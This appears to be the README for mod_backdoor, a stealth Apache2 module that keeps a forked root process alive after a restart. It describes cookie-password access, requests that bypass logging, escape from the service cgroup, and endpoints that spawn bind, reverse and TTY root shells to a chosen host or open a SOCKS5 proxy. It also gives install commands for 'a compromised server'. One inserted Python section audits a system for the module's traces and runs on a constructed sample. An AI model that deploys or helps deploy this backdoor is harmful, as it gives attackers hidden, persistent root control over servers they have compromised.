A backdoor module for Apache2
mod_backdoor is a stealth backdoor implemented as an Apache2 module.
The main idea is to fork() the primary Apache2 process just after it has loaded its config.
Since the fork happens before the root user hands the process over to www-data, you can execute commands as root.
As Apache2 loads its configuration only when you (re)start it, the challenge was to never let this forked root apache2 process die, so that we can keep interacting as root with the compromised system.
The password is sent through the Cookie header: `Cookie: password=backdoor`. It is defined with a `#define` at the beginning of mod_backdoor.c, so you can easily edit it.
Each subsequent request must contain this password to interact with the module.
Each request containing this cookie will not be logged by Apache if the module is running.
Each shell spawns attached to PID 1 and is removed from the apache2 cgroup.
This means it is possible to restart/stop apache2.service from a spawned shell (not true for TTY shells, because an apache2 process is needed to do the bidirectional communication between the socket and the pty). It also improves stealth: the shells are no longer related to apache2.service.
On non-systemd systems, it should work as well. The main difference is that, with systemd, the IPC socket is stored in a private `/tmp/`. This private `/tmp` is automatically cleaned up when apache2 stops, and systemd automatically kills all instances of apache2 when you ask for a stop. Without systemd there is no private `/tmp` for the application, so the IPC socket is created in the public `/tmp`.
To handle this case, the module replaces `/var/run/apache2/apache2.pid` with the PID of our forked root apache2 process and saves the original one. It then catches `SIGTERM` / `SIGKILL` in order to:
* Remove the IPC socket
* Remove the cgroup2 folder
* Put the original PID back in `/var/run/apache2/apache2.pid`
* Call `apachectl stop` to simulate the original behavior of the init script
* Exit our forked root apache2 process

The path `/var/run/apache2/apache2.pid` is taken from the environment variable `APACHE_PID_FILE`.
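A defender-side check for the traces this mechanism leaves behind (an added example, not part of mod_backdoor): a second root-owned apache2 process, a pid file that no longer names the parent of the www-data workers, and an apache2 process that has left the apache2.service cgroup. The `Proc` record, the `snapshot()` reader and the sample process table are constructed for this example, and it assumes the forked process keeps the apache2 process name.

```python
import os
from dataclasses import dataclass
@dataclass
class Proc:
    pid: int
    ppid: int
    uid: int     # real uid: first value of the "Uid:" line in /proc/<pid>/status
    comm: str    # "Name:" line in /proc/<pid>/status
    cgroup: str  # contents of /proc/<pid>/cgroup

def audit(procs, pid_file_pid, unit="apache2.service"):
    """Return (finding, pid) pairs for the three indicators described above."""
    findings = []
    httpd = [p for p in procs if p.comm == "apache2"]
    root_httpd = [p for p in httpd if p.uid == 0]
    # 1. Only the master should run as root; a second root apache2 is the forked copy.
    if len(root_httpd) > 1:
        findings += [("extra root apache2 process", p.pid) for p in root_httpd]
    # 2. The pid file should name the worker parent, not the forked root process.
    worker_parents = {p.ppid for p in httpd if p.uid != 0}
    if pid_file_pid not in worker_parents:
        findings.append(("pid file does not name the worker parent", pid_file_pid))
    # 3. The module parks its process in its own cgroup2 folder so a service stop misses it.
    findings += [("apache2 process outside " + unit, p.pid)
                 for p in httpd if unit not in p.cgroup]
    return findings

def snapshot():
    """Read the live process table from /proc (Linux only)."""
    procs = []
    for entry in filter(str.isdigit, os.listdir("/proc")):
        try:
            with open(f"/proc/{entry}/status") as f:
                fields = dict(line.split(":", 1) for line in f if ":" in line)
            with open(f"/proc/{entry}/cgroup") as f:
                cgroup = f.read()
        except OSError:  # the process exited while we were reading it
            continue
        procs.append(Proc(int(entry), int(fields["PPid"]), int(fields["Uid"].split()[0]),
                          fields["Name"].strip(), cgroup))
    return procs

# Constructed sample (not real data): master 1000 with two www-data workers, plus the
# forked root process 1003, moved out of the unit cgroup and written into apache2.pid.
SAMPLE = [
    Proc(1000, 1, 0, "apache2", "0::/system.slice/apache2.service\n"),
    Proc(1001, 1000, 33, "apache2", "0::/system.slice/apache2.service\n"),
    Proc(1002, 1000, 33, "apache2", "0::/system.slice/apache2.service\n"),
    Proc(1003, 1, 0, "apache2", "0::/backdoor\n"),
]
```

On a live Debian host, run `audit(snapshot(), pid)` with `pid` read from the file named by `APACHE_PID_FILE` (default `/var/run/apache2/apache2.pid`); on cgroup v1 hosts the cgroup file has several lines and the substring check still applies.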
If you have a better idea for init-like systems, feel free to contact me (or send a PR)!
The apache2 server needs to be compiled with `mod_so` to allow Dynamic Shared Object (DSO) support.
The endpoint `http[s]:///bind/`, with the port appended, binds a listening port on the server.
`forkpty()` is used to obtain a native TTY shell, working with an IPC UNIX socket to communicate between the forked TTY process and the new socket you just opened.
To upgrade the terminal on the client side: `CTRL-Z --> stty raw -echo --> fg --> reset`
It works like the bind shell: the endpoint `http[s]:///revtty//`, with the host and port appended, returns a TTY shell to that host and port.
The endpoint `http[s]:///reverse///`, with the host, port and shell type appended, returns a shell to that host and port. Available shells:
| Native | External |
| :------: | :--------:|
| sh | php |
| bash | python |
| dash | ruby |
| ash | perl |
| tcsh | |
| ksh | |
Native shells go through the `exec` function; external ones go through `/bin/sh`.
The SOCKS5 proxy source code comes from https://github.com/rofl0r/microsocks
The endpoint `http[s]:///proxy//`, with the port and an optional user appended, opens a socks5 proxy on that port. If you set the user, it activates the auth mode; the password is the same as the mod_backdoor one. Once a client has authenticated with user:pass, it is added to a whitelist and may use the proxy without auth. This is handy for programs like Firefox that don't support user:pass auth.
1. Open a socks5 proxy on port 1337 with the `vlad` user: `curl -H 'Cookie: password=backdoor' http:///proxy/1337/vlad`
2. Use it: `curl -x socks5://vlad:backdoor@<target>:1337 https://www.google.com`
3. Close it by sending `imdonewithyou` in a socket: `echo "imdonewithyou" | nc <target> 1337`
The endpoint `http[s]:///ping` tells you if the module is currently working.
Apache2 Module Backdoor is inspired by Ringbuilder, created by Juan Manuel Fernandez (@TheXC3LL).
More info about Ringbuilder:
https://github.com/TarlogicSecurity/mod_ringbuilder
https://www.tarlogic.com/en/blog/backdoors-modulos-apache/
Socks5 code was adapted from https://github.com/rofl0r/microsocks
Special thanks to @Ug_0Security
For development:
* `apxs -i -a -c mod_backdoor.c sblist.c sblist_delete.c server.c -Wl,-lutil` (`-Wl,-lutil` links mod_backdoor.so with libutil.so to use forkpty())
* `systemctl restart apache2`
On a compromised server:
* Compile it for the desired arch and retrieve mod_backdoor.so, or get it from the `build/` folder (compiled for: Apache/2.4.41 (Debian)).
* Copy mod_backdoor.so to `/usr/lib/apache2/modules/mod_backdoor.so`
* Copy backdoor.load to `/etc/apache2/mods-available/backdoor.load`
* `a2enmod backdoor` --> `systemctl restart apache2`
Vlad Rico (@RicoVlad)
This project was created only for learning purposes.
Usage of mod_backdoor for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.